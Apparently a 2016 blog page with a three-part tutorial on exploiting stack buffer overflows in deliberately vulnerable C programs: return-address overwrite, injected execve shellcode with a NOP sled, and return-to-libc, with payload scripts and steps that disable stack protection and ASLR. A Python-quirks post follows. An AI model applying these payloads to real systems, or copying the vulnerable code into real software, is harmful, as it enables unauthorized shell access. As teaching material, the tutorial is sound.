Thursday 29 September 2016

Part 3 | Stack-based Buffer Overflow exploitation to shell by example

This is continuation of my guide on binary exploitation, in this part we are going to cover return-to-libc attack which was invented to defeat DEP/Non executable stack. As you can remember, we have used the fact that stack is executable in the previous part of this guide.

5. DEP/NX

Today all of the standard software is compiled without executable stack, this is a protection that was introduced as a response to the attack that I've showed you the last time. Do you recall '-z execstack' option? If we were to use the last exploit on binary which is not compiled with that flag, we wouldn't get shell at all. Processor when jumping on to the stack would know that this memory shouldn't be executed, this is rw(read and write) section only.
Cybersecurity is a big war, when there is a protection in place, after some time someone finds a way around it, so in this post I'll show you what the bad guys figured out to exploit stack based buffer overflow even when DEP/NX is turned on.

For example source code we will use exactly the same one as previously.
Only compilation parameters will change, we are goin to remove execstack flag and add '-m32' switch, because I'll show you how to bypass NX on x86 (32 bit):

gcc exploit102.c -o exploit102 -fno-stack-protector -m32

Why 32bit vs 64bit matter at all? Isn't it all the same thing when it comes to exploitation?
Turns out that not really, the reason behind that are different calling conventions in those architectures. I've already linked a great paper by Agner Fog where you can find (16th) page called 'Function calling conventions'. Looking at the table provided it's easy to spot the differences. In C programming language 'stdcall' is the call that we are interested in, it's a convention in which all the arguments are pushed on to the stack.
So stack after calling a function with following signature
void function(int a, int b, int c);
would look like this:
| ebp | eip | c | b | a | ...
We are going to use this feature in our exploit.

6. Return-to-libc

Knowing that we cannot execute our code from the stack, we can use something called return-to-libc attack, which is simplified version of Return Oriented Programming(ROP).
In short, we want to override eip with address of some function from libc(standard C library) and pass arguments to it using stack.

Let's say we want to return to system() function.
( Quick look into gdb and we know what the address of system() is)

So for this to happen, our stack must be overwritten to look like so:
| ebp | eip | c | b | a | ...
| JUNK | 0xf7e28d80 | JUNK(new eip) | argv[1] | ...

What will happen is that after function returns, it will return to system() function which needs one argument from the stack so it will pop that from it. If we make it valid argument, call will be successful.
Because we are not calling our new function with call instruction, we need to supply next eip on the stack by ourselves to keep offsets to the arguments right.
Our goal will be to call:
system("/bin/sh"); or system("sh");

We will use latter option (I leave first one as exercise for the reader (Tip: Put it on the stack or inside env variable in case of self exploitation)).
For that we will use very convenient feature that pwndbg has of finding sequence of bytes inside a binary.

We got everything we need:
system(): 0xf7e28d80
'sh': 0xf7dfc5f7

You should already know how to find out which bytes of overflown buffer are landing inside eip. If you don't remember check out part 1.

7. Another exploit!

import struct

def dd(v):
    return struct.pack("I", v)

buf = ""
buf += dd(0xf7e28d80)
buf += dd(0xdeadbeef)
buf += dd(0xf7dfc5f7)

with open("payload", "wb") as f:
    f.write("A" * 1036)
    f.write(buf)

Take note of dq -> dd change, that is caused by the pointer size change from quad word to double word (8 bytes -> 4 bytes).

And we got shell again! :)

Exercise: try to return from shell cleanly, without segmentation fault error. (Tip: what is the return address of system() call, how about calling exit() after all ?).

And there you have it, you have survived another part of this tutorial, good job!

Part 2 | Stack-based Buffer Overflow exploitation to shell by example

In part 1 we've covered basic mechanisms of exploitation, but there is one caveat about example from part 1, that is we are not executing our code, but only changing the code path to run function that is already inside the binary.
This sometimes can be enough, but most of the times, we would like to execute our own code to get shell or remote shell, and that's exactly what we will cover in this part.
Attack that is shown in this part of the guide is historically the first thing that was used to exploit buffer overflows. Our goal is to put the code on the stack and redirect execution of the process to that region where it is placed. Because this is very old attack, there were implemented mitigations to prevent it from happening. This is why we are going to disable protection that makes the stack not executable section of memory.

3. Writing shellcode

Let's use modified example vulnerable code from part 1, everything stays the same but we don't have shell spawning function.

#include <stdio.h>
#include <string.h>

void exploitMe(FILE *f)
{
    char buf[1024];
    fread(buf, 1, 2048, f);
    puts(buf);
}

void main(int argc, char **argv)
{
    if (argc != 2)
    {
        puts("usage: exploit101 [filename]");
        return;
    }
    FILE *f = fopen(argv[1], "rb");
    if (f == NULL)
        return;
    exploitMe(f);
    fclose(f);
}

This time we are going to compile without stack cookies and with executable stack.

gcc exploit101.c -o exploit101 -fno-stack-protector -z execstack

Another thing for this to work (we will cover advanced techniques later on) is that we need to disable ASLR:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

We want a snippet of code that is going to spawn shell. The problem is that we can't write this in C or Python because we are going to put the code inside the memory and then point to it with rip to run it. So we need it already compiled in a form that processor will understand it directly.
Code that is written in just bytes is often called shellcode which originated from payloads that spawned shells and were in this exact form.
How to write a shellcode?
There are few options, metasploit is one of them, and is probably the easiest one as well, msfvenom is part of metasploit that is capable of generating shellcodes. Other option would be to type in google something along those lines: 'x64 shellcode linux' and trust that this:

shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

is really a shell spawning code (which it probably is).
Because I'm a trusty guy I'm going to assume that this shellcode is indeed correct and that it's gonna spawn a shell. We got our code, now we just need to force it's execution.

To do this we want the corresponding values on stack to look like this:
| buf | rbp | rip | ... | ...
|
v
| JUNK | ptr to shellcode | shellcode |

Let's check what is the address where our shellcode is going to end up.

$ gdb ./exploit101
pwndbg> b exploitMe
pwndbg> r file
pwndbg> n

Repeating 'n' till we get to ret can tell us what is the rsp value when returning from function, one address after that is going to start our code. Because stack is growing towards lower numbered addresses. We need to overrite rip with 0x7fffffffdae8 + 0x8 in this case.

4. Stack exec exploit

Exploit should be generated by running this code:

import struct, os

def dq(v):
    return struct.pack("Q", v)
with open("payload", "wb") as f:
    f.write("A" * 1032)
    f.write(dq(0x7fffffffdaf0))
    f.write("\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")

Running it under gdb gives us shell (yaaaaaay!).

5. gdb is a liar

We were able to exploit vulnerability under gdb, let's see if we can achieve the same in normal circumstances:

It didn't work, the reason is that gdb is adding additional information in the memory which causes some offsets to change inside binary, this is something that we need to be aware when tracing process with gdb!
The remedy in this case is pretty simple, we are going to use something that is widely known as NOP sled. It's a technique that makes it more likely to hit our exploit with approximate address value of our exploit. Making big chunk of No Operation(processor doesn't do anything one them just goes to the next instruction) instructions before our exploit allows us to land anywhere in the NOP sled and still be able to execute our exploit. In addition to that, we are going to add some to our address.

This results in(nop is 0x90 under x86 architecture family):

import struct, os

def dq(v):
    return struct.pack("Q", v)
with open("payload", "wb") as f:
    f.write("A" * 1032)
    f.write(dq(0x7fffffffdba0))
    f.write("\x90"*400)
    f.write("\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")

And test run!

This time, everything went as expected, we got a shell. Just for reference let's check how it looks in the memory.

NOP sled
Exploit
Take note of the addresses which do not grow linearly near the NOP sled.

That's everything I've got for part 2 of this tutorial. In the next part we will cover a return-to-libc attack and a bit of ROP. Stay tuned!
Part 3

Part 1 | Stack-based Buffer Overflow exploitation to shell by example

There are a lot of tutorials out there about exploitation of memory corruption bugs, but I struggled to find step-by-step ones, that would start with simplest examples possible.
So I figured that while learning more advanced techniques of exploitation I can dump my knowledge about those which I already know.
OK, so let's start from the ground up!

0. Prerequisites

In this tutorial I'm going to use a few tools:

- gdb (with pwndbg extension - https://github.com/pwndbg/pwndbg) - writing exploits means spending a lot of time in this tool, I recommend learning it as fast as possible

- metasploit

- python! - gr8 for creating tools/payload generating scripts etc.

Other than that, a little bit of assembly knowledge would be really helpful.
http://www.agner.org/optimize/calling_conventions.pdf - document with calling conventions for a lot of architectures, we are gonna look inside a few times.

We are going to assume that we are working on x86_64(Linux) architecture if not stated otherwise.

Be aware that if you really want to learn this stuff, you have to do all of those steps by yourself also, otherwise there won't be much that you will get from it.

1. Finding a bug and information gathering

For the simplicity of this guide, we will stick to C programming language for all the examples.

So suppose you found a bug, by fuzzing, code review or maybe you found some crash reports laying around and after further inspection it looks like there is some vulnerable code.
Suppose we have the following:

#include <stdio.h>
#include <string.h>

// TODO: REMOVE THIS FUNCTION
void execute_bash()
{
    system("/bin/sh");

}
void exploitMe(FILE *f)
{
    char buf[1024];
    fread(buf, 1, 2048, f);
    puts(buf);
}

void main(int argc, char **argv)
{
    if (argc != 2)
    {
        puts("usage: exploit101 [filename]");
        return;
    }
    FILE *f = fopen(argv[1], "rb");
    if (f != NULL){
        exploitMe(f);
        fclose(f);
    }
}

As we can quickly tell, function exploitMe is doing something really not cool.
Buffer 'buf' with 1024 bytes that are allocated on the stack could be overflown with any file with bigger content than 1024.
Of course this example is the kind of code you probably would never see in real life (I hope so at least) but it will serve well for our purposes.
Our goal would be to run execute_sh function, to do this, we need to somehow redirect execution of the program to section in memory where this function is kept.

Before that, let's compile our source code so later on we can attach a debugger and see what's going on in the memory!

gcc exploit100.c -o exploit100 -fno-stack-protector

Compiling it with '-fno-stack-protector' stops compiler from putting stack canaries inside our executable, don't worry about it too much, we will cover it later.

Stack layout

According to what we can see in the code above, stack layout in the moment of calling fread() should look like this:

| buf | rbp | rip | ... | ...

Stack? rip? rbp? wtf?

Let me explain everything!

Calling a function

Let's start with calling a function, what really happens when one does exploitMe() or calls any other function?

Every process has a place in memory that is called the stack, stack works exactly how it sounds, you can push something on the stack or pop something from the stack(btw. this is exactly what assembly instructions 'pop' and 'push' do).

One could ask why do we need this at all?

Processor has something around 15 general purpose registers that could be used for everything, but every piece of information that needs to be stored after that 15, must go somewhere, if it's not a constant and it's not dynamically allocated by malloc() for example, it's gonna most likely end up on the stack.
One thing to note here is that stack is growing towards lower numbered addresses.

Stack has also another use, every time a function is called, a stack frame is pushed on the stack.

That frame consists of as follows:

arguments of a function

on x86_64 - 6 first arguments passed by registers, rest on the stack.
on x86 - all arguments are pushed on the stack.
you can check details and other architectures conventions in this paper

rip - it's a register(instruction pointer) that points to current place in the memory that is being executed, this value must be saved, so processor knows where to come back after the function returned and it's the thing that we would like to change to alter execution path!
rbp - register(base pointer) that points to start of the previous stack frame (not important for us).

After stack frame is pushed, inside of a function, stack is used for local variables like the one we can see in the example code, so for example 'buf' would be pushed on the stack.

Stack layout

Going back to this:
| buf | rbp | rip | ... | ...

As we can see, writing past the buf buffer can overflow to rbp and then to rip, if we could control what we overflow rip with, we could return not to main, but to another place in memory, in our case execute_sh() looks just fine!

Crashing and bashing

Let's find out if we really can overwrite rip, and if so which byte of our input does that, so we would know which bytes to substitute with the address of execute_sh().

$ python -c 'print "A"*1200' > file
$ ./exploit100 file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Segmentation fault (core dumped)

Program is crashing as we expected it to do, for more information let's use gdb:

$ gdb ./exploit100
pwndbg> r file

If you use pwndbg you should probably see something along those lines:

Processor tried to go to 0x4141414141414141 returning from function(0x41 is ascii for "A"), but there is nothing there so SEGMENTATION FAULT was thrown.
Next step would be to find out, to which bytes of our input process is actually returning.
We can use metasploits pattern_create.rb or do it manually.
I will show you the latter:

python -c 'print "A"*1016 + "B"*8 + "C"*8 + "D"*8 + "E"*8 + "F"*8' > file

After running it under gdb we can see this:

As we can see under current instruction ret - return address was 0x4444444444444444 which means that the place where we put "D"*8 is the place where we should put our function pointer, so let's find out it's value.

To find exact place in memory where we want to return we are going to use gdb again.

As we can see our function is at 0x40064d (the function inside source code actually is called execute_sh not execute_bash, my bad, sorry)

2. Exploit

Now that we understood everything that is happening under the hood we can write some code for exploitation.
Our payload generator would like so:

import struct

def dq(v):
    return struct.pack("Q", v)

with open("payload", "wb") as f:
    f.write("A" * 1032)
    f.write(dq(0x40064d))

struct.pack() is a function that takes int value and transforms it into binary representation of that value inside memory("Q" means quad word little endian - 8bytes with least significant byte first)

$ python payloadmaker100.py
$ ./exploit100 payload
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAM @
$ 
^- shell spawned from our proccess

That's how we pwned our first binary!
This was part 1 of guide on exploitation of stack-based buffer overflows, started with simplest example there is more to come in next parts!
Part 2

Magic behind python WAT moments

So once upon a time you find that thing in your programming language that behaves not really how you would expect it to.
This post will be about those moments when you are programming in python.

1. 'is' on small ints

This is one of the most popular one, let's say you write something along those lines (which you probably never should actually, I will explain why in a sec):

>>> a = 5

>>> b = 5

>>> a is b

True

Okay, that's seems reasonable, 5 is definitely a 5, let's try the next one.

>>> a = 300

>>> b = 300

>>> a is b

False

wat? This seems pretty inconsistent... But why?
For that we will have to look inside python implementation!
(This one is from python 3.5.2):

Objects/longobject.c

#ifndef NSMALLPOSINTS
#define NSMALLPOSINTS 257
#endif
#ifndef NSMALLNEGINTS
#define NSMALLNEGINTS 5
#endif

...

/* Small integers are preallocated in this array so that they
   can be shared.
   The integers that are preallocated are those in the range
   -NSMALLNEGINTS (inclusive) to NSMALLPOSINTS (not inclusive).
*/
static PyLongObject small_ints[NSMALLNEGINTS + NSMALLPOSINTS];

Uh, now everything makes sense! Integers between -5 and 256 are kept in an array for quick access.
So with 'is' operator that checks if tested objects are the same one, it's true only for -5 <= x <= 256.
That's why I said you shouldn't use this code in the first place(I've seen it a few times), it's misuse of 'is' operator which in this case should be replaced with '=='.

2. type comparison

Let's play with REPL just for a bit longer.

>>> 5 < "a"
True

>>> True > "a"
False

>>> {} > 5
True

At a glance it doesn't make much sense, but fast lookup into documentation tells us everything we need to know.

CPython implementation detail: Objects of different types except numbers are ordered by their type names; objects of the same types that don’t support proper comparison are ordered by their address.

Note: This is only true for Python 2.*, Python 3.* documentation states this:

The <, <=, > and >= operators will raise a TypeError exception when comparing a complex number with another built-in numeric type, when the objects are of different types that cannot be compared, or in other cases where there is no defined ordering.

Which you can confirm with a simple check.

3. default function value

More fun:

>>> def fun(bar=[]):
...   bar.append("yoyo")
...   return bar
... 
>>> fun()
['yoyo']
>>> fun()
['yoyo', 'yoyo']

That "feature" is the one that everyone should know. It's really surprising for newcomers, for explanation and workaround I advise to read this.

desc0n0cid0

Python, cybersecurity, programming.

Me

Blog Archive

Thursday 29 September 2016

Part 3 | Stack-based Buffer Overflow exploitation to shell by example

5. DEP/NX

6. Return-to-libc

7. Another exploit!

Wednesday 28 September 2016

Part 2 | Stack-based Buffer Overflow exploitation to shell by example

3. Writing shellcode

4. Stack exec exploit

5. gdb is a liar

Tuesday 27 September 2016

Part 1 | Stack-based Buffer Overflow exploitation to shell by example

0. Prerequisites

1. Finding a bug and information gathering

Stack layout

Calling a function

Stack layout

Crashing and bashing

2. Exploit

Thursday 22 September 2016

Magic behind python WAT moments

1. 'is' on small ints

2. type comparison

3. default function value